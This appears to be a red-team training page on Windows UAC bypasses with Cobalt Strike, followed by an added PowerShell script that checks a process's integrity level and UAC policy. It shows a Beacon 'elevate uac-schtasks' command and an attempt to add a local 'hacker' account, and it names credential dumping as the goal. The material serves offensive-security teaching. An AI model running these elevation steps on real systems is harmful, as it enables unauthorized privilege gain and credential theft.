UAC Bypasses
User Account Control (UAC) is a Windows feature that makes applications prompt for consent before they are granted an administrative access token. Bob is a local administrator on Workstation 2, but if we open a Command Prompt and try to add a new local user, we get access denied. This instance of cmd.exe is running with a filtered token in "medium integrity", so membership of the Administrators group is not in effect.
C:\Users\bfarmer>net user hacker Passw0rd! /add
System error 5 has occurred.
Access is denied.
C:\Users\bfarmer>whoami /groups
Mandatory Label\Medium Mandatory Level
Instead, we must right-click cmd.exe and select "Run as administrator", which causes a UAC prompt to appear.
Only after clicking Yes will the Command Prompt have sufficient privileges to make system configuration changes, as it will now be running in "high integrity".
C:\Windows\system32>whoami /groups
Mandatory Label\High Mandatory Level
A UAC "bypass" is a technique that allows a medium integrity process to elevate itself, or spawn a new process, in high integrity without prompting the user for consent. It is not a privilege escalation in its own right: the user must already be a member of the local Administrators group, and most bypasses rely on auto-elevating Windows binaries, which the "Always notify" UAC setting disables. Being in high integrity matters to attackers because it is required for various post-exploitation actions such as dumping credentials.
Beacon has a few built-in UAC bypasses, and a few more are provided by the Elevate Kit (already pre-loaded into Cobalt Strike for your convenience). They are exposed via the elevate command.
beacon> elevate uac-schtasks tcp-local
[*] Tasked Beacon to run windows/beacon_bind_tcp (127.0.0.1:4444) in a high integrity context
[+] established link to child beacon: 10.10.123.102
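Before spending an elevate attempt, it is worth confirming that the process really is in the state the walkthrough above assumes: a filtered administrator token at medium integrity, with UAC enabled but not set to "Always notify". The PowerShell below is an added example and not part of the course material or of Cobalt Strike; it assumes a modern Windows host with whoami.exe on the PATH, and the function name Get-UacContext is my own.

```powershell
# Added example (not from the course page): report whether the current process is a
# candidate for a UAC bypass before spending an elevate attempt on it.
# Assumptions (mine): modern Windows host, whoami.exe on the PATH.

Add-Type -Namespace Uac -Name Native -MemberDefinition @'
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool GetTokenInformation(IntPtr TokenHandle, int TokenInformationClass,
    out int TokenInformation, int TokenInformationLength, out int ReturnLength);
'@

function Get-UacContext {
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = [Security.Principal.WindowsPrincipal]$identity
    $adminRole = [Security.Principal.WindowsBuiltInRole]::Administrator

    # TokenElevationType (class 18): 1 = Default (UAC off, or user is not an admin),
    # 2 = Full (elevated), 3 = Limited (filtered admin token: the medium-integrity case).
    $elevType = 0; $retLen = 0
    if (-not [Uac.Native]::GetTokenInformation($identity.Token, 18, [ref]$elevType, 4, [ref]$retLen)) {
        throw "GetTokenInformation failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }

    # Integrity level from the S-1-16-<RID> label SID in 'whoami /groups'. The SID is
    # locale independent, unlike the "Medium Mandatory Level" text shown on the page.
    $rids = @{ 4096 = 'Low'; 8192 = 'Medium'; 8448 = 'MediumPlus'; 12288 = 'High'; 16384 = 'System' }
    $integrity = 'Unknown'
    foreach ($line in (& whoami.exe /groups)) {
        if ($line -match '\bS-1-16-(\d+)\b') {
            $rid = [int]$Matches[1]
            $integrity = if ($rids.ContainsKey($rid)) { $rids[$rid] } else { "RID $rid" }
            break
        }
    }

    # UAC policy: EnableLUA = 0 means UAC is off entirely; ConsentPromptBehaviorAdmin = 2
    # is "Always notify", which blocks the auto-elevation most bypasses rely on.
    $pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $enableLua = [int]$pol.EnableLUA
    $cpba      = [int]$pol.ConsentPromptBehaviorAdmin

    [pscustomobject]@{
        User                       = $identity.Name
        IntegrityLevel             = $integrity
        IsElevated                 = $principal.IsInRole($adminRole)
        TokenElevationType         = @{ 1 = 'Default'; 2 = 'Full'; 3 = 'Limited' }[$elevType]
        EnableLUA                  = $enableLua
        ConsentPromptBehaviorAdmin = $cpba
        # A bypass only makes sense for a filtered admin token with UAC on and not at "Always notify".
        BypassApplicable           = ($elevType -eq 3 -and $enableLua -eq 1 -and $cpba -ne 2)
    }
}

Get-UacContext | Format-List
```

Run it from Bob's medium-integrity prompt on Workstation 2 and you should see IntegrityLevel Medium, TokenElevationType Limited and BypassApplicable True; run it again from the high-integrity Beacon (or the "Run as administrator" prompt) and it reports High and Full. TokenElevationType Default with IsElevated False means the user is not a local administrator at all, so a UAC bypass is the wrong tool and a different escalation path is needed.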